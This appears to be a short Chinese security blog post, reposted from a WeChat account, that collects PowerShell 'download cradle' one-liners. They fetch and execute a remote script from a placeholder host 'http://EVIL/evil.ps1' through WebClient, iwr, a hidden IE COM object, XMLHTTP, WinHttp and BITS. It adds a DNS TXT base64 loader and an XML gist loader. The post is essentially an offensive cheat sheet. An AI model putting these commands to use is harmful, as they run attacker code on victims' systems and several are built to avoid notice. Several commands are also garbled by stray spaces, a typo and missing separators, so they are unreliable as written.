一些有趣的powershell加载命令

  • A+
所属分类:安全闲碎

普通下载

IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

一些有趣的powershell加载命令


PowerShell 3.0+

IEX (iwr 'http://EVIL/evil.ps1'


一些有趣的powershell加载命令


隐藏的IE com对象

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r


一些有趣的powershell加载命令


Msxml2.XMLHTTP COM对象

$h=New-Object -ComObject Msxml2.XMLHTTP$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText


一些有趣的powershell加载命令


WinHttp COM对象(不识别代理!)

$ h = new-object -com WinHttp.WinHttpRequest.5.1; $ h.open('GET'' http://EVIL/evil.ps1',$false); $ h.send(); iex $ h.qesponseText


一些有趣的powershell加载命令


使用bitstransfer

Import-Module bitstransfer; Start-BitsTransfer'http ://EVIL/evil.ps1'$ env:temp  t; $ r = gc $ env:temp  t; rm $ env:tempt; iex $ r


一些有趣的powershell加载命令

PowerBreach的DNS TXT方法

要执行的代码必须是存储在TXT记录中的base64编码的字符串

IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
<#<?xml version="1.0"?><command>   <a>      <execute>Get-Process</execute>   </a>  </command>#>
$a = New-Object System.Xml.XmlDocument$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")$a.command.a.execute | iex



本文始发于微信公众号(黑白天实验室):一些有趣的powershell加载命令

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: